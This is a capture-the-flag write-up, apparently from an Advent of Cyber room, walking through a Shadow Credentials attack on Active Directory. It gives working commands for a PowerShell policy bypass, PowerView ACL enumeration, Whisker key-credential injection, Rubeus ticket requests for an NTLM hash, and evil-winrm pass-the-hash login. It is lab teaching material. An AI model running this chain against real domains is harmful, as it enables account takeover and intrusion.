Day 11

Active Directory Jingle Bells, Shadow Spells

Learning Objectives

• Understanding Active Directory

• Introduction to Windows Hello for Business

• Prerequisites for exploiting GenericWrite privilege

• How the Shadow Credentials attack works

• How to exploit the vulnerability

Active Directory 101

Active Directory (AD) is a system mainly used by businesses in Windows environments. It's a centralised authentication system. The Domain Controller (DC) is at the heart of AD and typically manages data storage, authentication, and authorisation within a domain.

This room is straightforward will all the commands and instructions given to us.

As instructed we first execute the following command in powershell as part of our enumeration.

cd C:\Users\hr\Desktop #moves to the folder containing all the exploitation tools.
powershell -ep bypass #will bypass the default policy for arbitrary PowerShell script execution.
. .\PowerView.ps1 #loads the PowerView script into the memory.

We then execute this command.

Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

Enumeration gives us user ID

We can now procced with the exploit.

As instructed we use the tool Whisker.

Whisker a C# utility created by Elad Shamir. Using Whisker is straightforward: once we have a vulnerable user, we can run the add command from Whisker to simulate the enrollment of a malicious device, updating the msDS-KeyCredentialLink attribute.

This task can be accomplished by running the following command:

.\Whisker.exe add /target:Administrator

In our case, we'll have to replace the /target parameter with the one from the enumeration step executed inside our VM.

The tool will conveniently provide the certificate necessary to authenticate the impersonation of the vulnerable user with a command ready to be launched using Rubeus.

Rubeus is a C# toolset designed for direct Kerberos interaction and exploitation, was developed by SpecterOps. a pass-the-hash attack!

The next command will be

.\Rubeus.exe asktgt <#COPY THIS PORTION FROM THE OUTPUT OF WHISKER#>

This will give us an NTLM hash which we can use Evil-WinRM, a tool for remotely managing Windows systems abusing the Windows Remote Management (WinRM) protocol.

evil-winrm -i 'IP_MACHINE' -u 'USERNAME' -H 'NTLM_HASH'

Remote Access with evil-WinRM

This will gives us remote access and we can proceed with answering the questions.

What is the hash of the vulnerable user?
[REDACTED]
This can be found in the output for Rubeus

What is the content of flag.txt on the Administrator Desktop?
[REDACTED]

Flag found